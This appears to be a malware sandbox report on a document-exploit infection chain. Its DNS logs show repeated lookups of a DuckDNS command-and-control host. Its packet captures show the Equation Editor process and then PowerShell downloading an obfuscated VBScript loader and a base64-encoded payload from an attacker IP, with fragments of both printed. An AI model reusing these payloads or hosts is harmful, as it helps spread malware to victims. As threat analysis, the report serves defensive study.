Apr 24, 2024 10:27:33.176611900 CEST	8.8.8.8	192.168.2.22	0x84b8	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:33.356985092 CEST	8.8.8.8	192.168.2.22	0x84b8	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:34.550755024 CEST	8.8.8.8	192.168.2.22	0x95	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:34.727529049 CEST	8.8.8.8	192.168.2.22	0x95	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:34.898195028 CEST	8.8.8.8	192.168.2.22	0x95	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:35.069375992 CEST	8.8.8.8	192.168.2.22	0x95	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:35.239026070 CEST	8.8.8.8	192.168.2.22	0x95	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:36.420582056 CEST	8.8.8.8	192.168.2.22	0x157a	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:36.591581106 CEST	8.8.8.8	192.168.2.22	0x157a	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:36.764870882 CEST	8.8.8.8	192.168.2.22	0x157a	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:36.934467077 CEST	8.8.8.8	192.168.2.22	0x157a	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:37.105537891 CEST	8.8.8.8	192.168.2.22	0x157a	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:38.293152094 CEST	8.8.8.8	192.168.2.22	0x400f	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:38.466911077 CEST	8.8.8.8	192.168.2.22	0x400f	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:38.638199091 CEST	8.8.8.8	192.168.2.22	0x400f	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:38.883676052 CEST	8.8.8.8	192.168.2.22	0x400f	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:39.057071924 CEST	8.8.8.8	192.168.2.22	0x400f	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:40.245357037 CEST	8.8.8.8	192.168.2.22	0x4410	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:40.416199923 CEST	8.8.8.8	192.168.2.22	0x4410	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:40.586611032 CEST	8.8.8.8	192.168.2.22	0x4410	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:40.759510994 CEST	8.8.8.8	192.168.2.22	0x4410	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:40.933456898 CEST	8.8.8.8	192.168.2.22	0x4410	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:42.114939928 CEST	8.8.8.8	192.168.2.22	0xbb09	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:42.285965919 CEST	8.8.8.8	192.168.2.22	0xbb09	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:42.457060099 CEST	8.8.8.8	192.168.2.22	0xbb09	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:42.628174067 CEST	8.8.8.8	192.168.2.22	0xbb09	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:42.801165104 CEST	8.8.8.8	192.168.2.22	0xbb09	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:43.992088079 CEST	8.8.8.8	192.168.2.22	0xba33	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:44.167944908 CEST	8.8.8.8	192.168.2.22	0xba33	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:44.339909077 CEST	8.8.8.8	192.168.2.22	0xba33	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:44.514199018 CEST	8.8.8.8	192.168.2.22	0xba33	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:44.690046072 CEST	8.8.8.8	192.168.2.22	0xba33	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:45.899342060 CEST	8.8.8.8	192.168.2.22	0x1c36	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:46.074635029 CEST	8.8.8.8	192.168.2.22	0x1c36	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:46.245273113 CEST	8.8.8.8	192.168.2.22	0x1c36	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:46.437905073 CEST	8.8.8.8	192.168.2.22	0x1c36	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:46.614128113 CEST	8.8.8.8	192.168.2.22	0x1c36	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

paste.ee

uploaddeimagens.com.br

192.210.214.26

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49161	192.210.214.26	80	1644	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 10:24:04.036433935 CEST	337	OUT	GET /26677/IEinternetMonkeykisserpdf.html HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 192.210.214.26 Connection: Keep-Alive
Apr 24, 2024 10:24:04.238842010 CEST	1289	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 08:24:04 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Last-Modified: Wed, 24 Apr 2024 01:01:50 GMT ETag: "1556c-616cd3735dd7d" Accept-Ranges: bytes Content-Length: 87404 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Data Raw: ff fe 0d 00 0a 00 0d 00 0a 00 20 00 20 00 20 00 20 00 6f 00 6e 00 20 00 65 00 72 00 72 00 6f 00 72 00 20 00 72 00 65 00 73 00 75 00 6d 00 65 00 20 00 6e 00 65 00 78 00 74 00 0d 00 0a 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 61 00 64 00 65 00 6e 00 6f 00 70 00 61 00 74 00 68 00 61 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 73 00 6f 00 66 00 72 00 65 00 72 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 6f 00 50 00 61 00 72 00 61 00 6d 00 44 00 69 00 63 00 74 00 0d 00 0a 00 0d 00 0a 00 20 00 20 00 20 00 20 00 27 00 0d 00 0a 00 20 00 20 00 20 00 20 00 27 00 20 00 41 00 62 00 6f 00 72 00 74 00 20 00 69 00 66 00 20 00 74 00 68 00 65 00 20 00 68 00 6f 00 73 00 74 00 20 00 69 00 73 00 20 00 6e 00 6f 00 74 00 20 00 63 00 73 00 63 00 72 00 69 00 70 00 74 00 0d 00 0a 00 20 00 20 00 20 00 20 00 27 00 0d 00 0a 00 0d 00 0a 00 0d 00 0a 00 20 00 20 00 20 00 20 00 73 00 65 00 74 00 20 00 6f 00 50 00 61 00 72 00 61 00 6d 00 44 00 69 00 63 00 74 00 20 00 3d 00 20 00 43 00 72 00 65 00 61 00 74 00 65 00 4f 00 62 00 6a 00 65 00 63 00 74 00 28 00 22 00 53 00 63 00 72 00 69 00 70 00 74 00 69 00 6e 00 67 00 2e 00 44 00 69 00 63 00 74 00 69 00 6f 00 6e 00 61 00 72 00 79 00 22 00 29 00 0d 00 0a 00 0d 00 0a 00 20 00 20 00 20 00 20 00 73 00 6f 00 66 00 72 00 65 00 72 00 20 00 3d 00 20 00 50 00 61 00 72 00 73 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 4c 00 69 00 6e 00 65 00 28 00 61 00 64 00 65 00 6e 00 6f 00 70 00 61 00 74 00 68 00 61 00 2c 00 20 00 6f 00 50 00 61 00 72 00 61 00 6d 00 44 00 69 00 63 00 74 00 29 00 0d 00 0a 00 0d 00 0a 00 20 00 20 00 20 00 20 00 69 00 66 00 20 00 73 00 6f 00 66 00 72 00 65 00 72 00 20 00 3d 00 20 00 31 00 20 00 74 00 68 00 65 00 6e 00 0d 00 0a 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 73 00 65 00 6c 00 65 00 63 00 74 00 20 00 63 00 61 00 73 00 65 00 20 00 61 00 64 00 65 00 6e 00 6f 00 70 00 61 00 74 00 68 00 61 00 0d 00 0a 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 63 00 61 00 73 00 65 00 20 00 64 00 65 00 73 00 71 00 75 00 69 00 63 00 69 00 61 00 72 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 73 00 6f 00 66 00 72 00 65 00 72 00 20 00 3d 00 20 00 43 00 72 00 65 00 61 00 74 00 65 00 4f 00 72 00 53 00 65 00 74 00 50 00 6f 00 72 00 74 00 28 00 6f 00 50 00 61 00 72 00 61 00 6d 00 44 00 69 00 63 00 74 00 29 00 0d 00 0a 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 63 00 61 00 73 00 65 00 20 00 6b 00 41 00 63 00 74 00 69 00 6f 00 6e 00 44 00 65 00 6c 00 65 00 74 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 73 00 6f 00 66 00 72 00 65 00 72 00 20 00 3d 00 20 00 44 00 65 00 6c 00 50 00 6f 00 72 00 74 00 28 00 6f 00 50 00 61 00 72 00 61 00 6d 00 44 00 69 00 63 00 74 00 29 00 Data Ascii: on error resume next dim adenopatha dim sofrer dim oParamDict ' ' Abort if the host is not cscript ' set oParamDict = CreateObject("Scripting.Dictionary") sofrer = ParseCommandLine(adenopatha, oParamDict) if sofrer = 1 then select case adenopatha case desquiciar sofrer = CreateOrSetPort(oParamDict) case kActionDelete sofrer = DelPort(oParamDict)
Apr 24, 2024 10:24:04.238867044 CEST	1289	IN	Data Raw: 0d 00 0a 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 63 00 61 00 73 00 65 00 20 00 6b 00 41 00 63 00 74 00 69 00 6f 00 6e 00 4c 00 69 00 73 00 74 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 Data Ascii: case kActionList sofrer = ListPorts(oParamDict) case inflorescente
Apr 24, 2024 10:24:04.239001989 CEST	1289	IN	Data Raw: 00 20 00 6f 00 50 00 6f 00 72 00 74 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 72 00 69 00 6e 00 74 00 6f 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 67 00 61 00 6c 00 65 00 6f 00 74 00 65 00 0d 00 0a 00 20 Data Ascii: oPort dim rinto dim galeote dim strPort dim incommunicavelmente dim pterocarpo rinto = r
Apr 24, 2024 10:24:04.239062071 CEST	1289	IN	Data Raw: 20 00 27 00 20 00 54 00 72 00 79 00 20 00 64 00 65 00 6c 00 65 00 74 00 69 00 6e 00 67 00 20 00 74 00 68 00 65 00 20 00 69 00 6e 00 73 00 74 00 61 00 6e 00 63 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 27 00 0d 00 0a 00 Data Ascii: ' Try deleting the instance ' oPort.Delete_ if Err.Number = cunhanhas then ws
Apr 24, 2024 10:24:04.239214897 CEST	1289	IN	Data Raw: 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 27 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 27 00 20 00 54 00 72 00 79 00 20 00 67 00 65 00 74 00 74 00 69 00 6e 00 67 00 20 00 65 00 78 00 74 00 65 00 6e 00 64 00 65 00 64 Data Ascii: ' ' Try getting extended error information ' call LastError() end if Del
Apr 24, 2024 10:24:04.239236116 CEST	1289	IN	Data Raw: 4d 00 73 00 67 00 5f 00 50 00 6f 00 72 00 74 00 30 00 36 00 5f 00 54 00 65 00 78 00 74 00 20 00 26 00 20 00 6d 00 69 00 61 00 70 00 69 00 61 00 20 00 26 00 20 00 6f 00 50 00 61 00 72 00 61 00 6d 00 44 00 69 00 63 00 74 00 2e 00 49 00 74 00 65 00 Data Ascii: Msg_Port06_Text & miapia & oParamDict.Item(kPortNumber) clangorar editorial, L_Text_Msg_Port07_Text & miapia & oParam
Apr 24, 2024 10:24:04.239274979 CEST	1289	IN	Data Raw: 00 20 00 73 00 65 00 74 00 74 00 69 00 6e 00 67 00 73 00 2e 00 20 00 4c 00 61 00 74 00 65 00 72 00 20 00 50 00 75 00 74 00 49 00 6e 00 73 00 74 00 61 00 6e 00 63 00 65 00 20 00 77 00 69 00 6c 00 6c 00 20 00 64 00 6f 00 20 00 61 00 6e 00 20 00 75 Data Ascii: settings. Later PutInstance will do an update ' if laudes(galeote, corifa, incommunicavelmente, pterocarpo, ir
Apr 24, 2024 10:24:04.239469051 CEST	1289	IN	Data Raw: 0d 00 0a 00 0d 00 0a 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 0d 00 0a 00 20 00 20 00 20 00 20 00 69 00 66 00 20 00 45 00 72 00 72 00 2e 00 4e 00 75 00 6d 00 62 00 65 00 72 00 20 00 3c 00 3e 00 20 00 63 00 75 00 Data Ascii: end if if Err.Number <> cunhanhas then wscript.echo L_Text_Msg_General03_Text & miapia & L_Error
Apr 24, 2024 10:24:04.240982056 CEST	1289	IN	Data Raw: 00 6f 00 72 00 74 00 2e 00 51 00 75 00 65 00 75 00 65 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 6f 00 50 00 61 00 72 00 61 00 6d 00 44 00 69 00 63 00 74 00 2e 00 49 00 74 00 65 00 6d 00 28 00 6b 00 51 00 75 00 65 00 75 Data Ascii: ort.Queue = oParamDict.Item(kQueueName) oPort.ByteCount = oParamDict.Item(kDoubleSpool) PortType
Apr 24, 2024 10:24:04.241117954 CEST	1289	IN	Data Raw: 63 00 74 00 69 00 6f 00 6e 00 0d 00 0a 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 Data Ascii: ction end if case "lpr" oPort.Protocol = 2
Apr 24, 2024 10:24:04.431372881 CEST	1289	IN	Data Raw: 00 20 00 20 00 20 00 20 00 77 00 73 00 63 00 72 00 69 00 70 00 74 00 2e 00 65 00 63 00 68 00 6f 00 20 00 74 00 72 00 65 00 6a 00 65 00 69 00 74 00 61 00 64 00 6f 00 72 00 20 00 26 00 20 00 6d 00 69 00 61 00 70 00 69 00 61 00 20 00 26 00 20 00 6f Data Ascii: wscript.echo trejeitador & miapia & oPort.Name rinto = cunhanhas else wscript.echo L_Tex

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49165	192.210.214.26	80	2824	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 10:24:19.028256893 CEST	77	OUT	GET /26677/RMC.txt HTTP/1.1 Host: 192.210.214.26 Connection: Keep-Alive
Apr 24, 2024 10:24:19.223023891 CEST	1289	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 08:24:19 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Last-Modified: Wed, 24 Apr 2024 00:58:32 GMT ETag: "a1000-616cd2b678264" Accept-Ranges: bytes Content-Length: 659456 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41 41 41 77 49 41 48 41 42 41 41 41 67 50 6b 36 44 6b 2b 67 6f 50 30 35 44 62 2b 51 6d 50 63 35 44 57 2b 41 6c 50 38 34 44 4e 2b 41 69 50 59 34 44 45 2b 67 67 50 45 34 44 41 39 77 66 50 34 33 44 38 39 77 65 50 6b 33 44 30 39 67 63 50 30 32 44 72 39 51 61 50 63 32 44 65 39 41 58 50 6f 31 44 5a 39 67 55 50 6f 30 44 4a 39 67 41 50 6f 7a 44 79 38 67 4b 50 49 79 44 61 38 67 45 50 6f 77 44 43 37 67 2b 4f 49 76 44 71 37 67 34 4f 6f 74 44 53 37 67 79 4f 49 6f 44 36 36 67 73 4f 6f 71 44 69 36 67 6d 4f 49 70 44 4b 36 51 69 4f 49 6b 44 36 35 67 63 4f 6f 6d 44 69 35 77 57 4f 6f 6c 44 59 35 41 55 4f 67 6b 44 41 34 41 4f 4f 41 6a 44 6f 34 41 49 4f 67 68 44 51 34 41 43 4f 45 63 44 2b 33 67 39 4e 34 65 44 6d 33 67 33 4e 59 64 44 4f 33 67 68 4e 34 62 44 35 32 77 74 4e 59 62 44 30 32 67 73 4e 41 62 44 76 32 41 70 4e 49 61 44 66 32 67 6c 4e 49 5a 44 52 32 67 69 4e 6b 59 44 44 32 67 67 4e 41 55 44 35 31 41 65 4e 59 58 44 70 31 67 5a 4e 34 56 44 62 31 41 55 4e 73 55 44 4a 31 41 53 4e 63 55 44 46 31 77 51 4e 45 51 44 38 30 67 4f 4e 6b 54 44 34 30 67 4e 4e 51 54 44 79 30 51 4c 4e 73 53 44 6d 30 41 4a 4e 4d 53 44 69 30 41 49 4e 34 52 44 63 30 77 46 4e 55 52 44 55 30 67 45 4e 41 52 44 4f 30 51 44 4e 59 51 44 46 7a 77 2f 4d 73 50 44 75 7a 41 37 4d 6b 4f 44 6c 7a 41 32 4d 59 4e 44 54 7a 77 7a 4d 49 4d 44 41 79 51 76 4d 6b 4c 44 73 79 67 71 4d 63 4b 44 6a 79 67 6c 4d 51 4a 44 52 79 51 6a 4d 41 45 44 2b 78 77 65 4d 63 48 44 71 78 41 61 4d 55 47 44 68 78 41 56 4d 49 46 44 50 78 77 43 4d 34 44 44 38 77 51 4f 4d 63 44 44 31 77 41 4b 4d 59 43 44 6a 77 51 49 4d 38 42 44 53 77 41 45 4d 30 41 44 4c 77 51 43 41 41 45 41 6b 41 59 41 34 41 41 41 41 2f 41 2f 50 6f 2f 44 33 2f 77 38 50 59 2b 44 6b 2f 51 34 50 30 39 44 51 2f 67 7a 50 73 38 44 48 2f 77 67 50 34 37 44 74 2b 77 71 50 67 36 44 6b 2b 41 6f 50 73 35 44 4b 2b 41 69 50 55 34 44 42 39 41 64 50 49 6e 44 65 35 41 57 4f 59 6c 44 56 35 41 56 4f 41 6c 44 50 35 77 53 4f 55 6b 44 44 35 67 51 4f 45 6b 44 41 34 77 50 4f 34 6a 44 36 34 51 4f 4f 55 6a 44 76 34 51 4c 4f 77 69 44 72 34 67 4b 4f 6b 69 44 6f 34 41 4a 4f 4d 69 44 66 34 51 47 4f 63 68 44 57 34 51 46 4f 51 68 44 54 34 77 44 4f 34 67 44 4b 34 41 42 4f 49 67 44 42 34 41 77 4e 38 66 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNzAjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDexQXMwBAAAwIAHABAAAgPk6Dk+goP05Db+QmPc5DW+AlP84DN+AiPY4DE+ggPE4DA9wfP43D89wePk3D09gcP02Dr9QaPc2De9AXPo1DZ9gUPo0DJ9gAPozDy8gKPIyDa8gEPowDC7g+OIvDq7g4OotDS7gyOIoD66gsOoqDi6gmOIpDK6QiOIkD65gcOomDi5wWOolDY5AUOgkDA4AOOAjDo4AIOghDQ4ACOEcD+3g9N4eDm3g3NYdDO3ghN4bD52wtNYbD02gsNAbDv2ApNIaDf2glNIZDR2giNkYDD2ggNAUD51AeNYXDp1gZN4VDb1AUNsUDJ1ASNcUDF1wQNEQD80gONkTD40gNNQTDy0QLNsSDm0AJNMSDi0AIN4RDc0wFNURDU0gENARDO0QDNYQDFzw/MsPDuzA7MkODlzA2MYNDTzwzMIMDAyQvMkLDsygqMcKDjyglMQJDRyQjMAED+xweMcHDqxAaMUGDhxAVMIFDPxwCM4DD8wQOMcDD1wAKMYCDjwQIM8BDSwAEM0ADLwQCAAEAkAYA4AAAA/A/Po/D3/w8PY+Dk/Q4P09DQ/gzPs8DH/wgP47Dt+wqPg6Dk+AoPs5DK+AiPU4DB9AdPInDe5AWOYlDV5AVOAlDP5wSOUkDD5gQOEkDA4wPO4jD64QOOUjDv4QLOwiDr4gKOkiDo4AJOMiDf4QGOchDW4QFOQhDT4wDO4gDK4ABOIgDB4AwN8f
Apr 24, 2024 10:24:19.223052025 CEST	1289	IN	Data Raw: 44 2b 33 67 2b 4e 6b 66 44 31 33 77 37 4e 30 65 44 73 33 77 36 4e 63 65 44 6d 33 67 34 4e 45 65 44 64 33 77 31 4e 55 64 44 55 33 41 30 4e 6f 63 44 49 33 77 78 4e 59 63 44 46 33 51 67 4e 73 62 44 36 32 41 74 4e 49 62 44 78 32 41 73 4e 38 61 44 75 Data Ascii: D+3g+NkfD13w7N0eDs3w6NceDm3g4NEeDd3w1NUdDU3A0NocDI3wxNYcDF3QgNsbD62AtNIbDx2AsN8aDu2gqNkaDl2wnN0ZDc2AmNcZDT2QjNsYDK2QiNUYDE2AQNoXD41wdNYXD11QcNAXDs1gZNQWDj1gYNEWDd1AXNgVDS1AUN8UDO1gSNkUDF0wPN0TD80wONoTD20QNNETDr0QKNgSDn0wINISDe0AGNYRDV0QENARDM0
Apr 24, 2024 10:24:19.223066092 CEST	1289	IN	Data Raw: 44 37 51 67 4f 38 72 44 39 36 77 75 4f 6b 72 44 33 36 51 74 4f 4d 72 44 78 36 77 72 4f 30 71 44 72 36 51 71 4f 63 71 44 6c 36 77 6f 4f 45 71 44 66 36 51 6e 4f 73 70 44 5a 36 77 6c 4f 55 70 44 54 36 51 6b 4f 38 6f 44 4e 36 77 69 4f 6b 6f 44 48 36 Data Ascii: D7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4Q
Apr 24, 2024 10:24:19.223107100 CEST	1289	IN	Data Raw: 36 77 73 4f 49 72 44 78 36 41 73 4f 38 71 44 75 36 51 72 4f 77 71 44 72 36 67 71 4f 6b 71 44 6f 36 77 70 4f 59 71 44 6c 36 41 70 4f 4d 71 44 69 36 51 6f 4f 41 71 44 66 36 67 6e 4f 30 70 44 63 36 77 6d 4f 6f 70 44 5a 36 41 6d 4f 63 70 44 57 36 51 Data Ascii: 6wsOIrDx6AsO8qDu6QrOwqDr6gqOkqDo6wpOYqDl6ApOMqDi6QoOAqDf6gnO0pDc6wmOopDZ6AmOcpDW6QlOQpDT6gkOEpDQ6wjO4oDN6AjOsoDK6QiOgoDH6ghOUoDE6wgOIoDB6AQO8nD+5QfOwnD75geOknD45wdOYnD15AdOMnDy5QcOAnDv5gbO0mDs5waOomDp5AaOcmDm5QZOQmDj5gYOEmDg5wXO4lDd5AXOslDa5QW
Apr 24, 2024 10:24:19.223165989 CEST	1289	IN	Data Raw: 51 68 4f 4d 6f 44 42 35 77 66 4f 30 6e 44 37 35 51 65 4f 63 6e 44 31 35 77 63 4f 45 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 Data Ascii: QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD33Q9NMfDx3w7N0eDr3Q6NceDl3w4MwODrzg6MkODozw5MYODlzA5M
Apr 24, 2024 10:24:19.223196030 CEST	1289	IN	Data Raw: 33 4f 78 76 7a 35 37 30 37 4f 77 75 6a 54 37 30 7a 4f 33 73 6a 4d 37 77 79 4f 4f 73 54 42 36 77 76 4f 6e 72 7a 59 36 6f 6b 4f 43 6b 44 38 35 4d 65 4f 59 6e 44 74 35 51 59 4f 33 6c 54 58 34 49 50 4f 79 65 7a 76 33 38 6a 4e 6a 5a 6a 48 7a 41 32 4d Data Ascii: 3Oxvz5707OwujT70zO3sjM7wyOOsTB6wvOnrzY6okOCkD85MeOYnDt5QYO3lTX4IPOyezv38jNjZjHzA2MaFjOwEPMNDjuw4KMiCjlwEFM5AjDAAAAICQBgBwPv/D3/A9PE/zn/Q3Py8TK/MyPY8TD+MvPN7zs+EoPZ5TK+ERPu2jk9cTPs0jD9QAPxzj56QtOFhDy20nNKVzk1AYNhVjU1kSNVQTr0YKNfSDmxQFAAAAXAUAUA
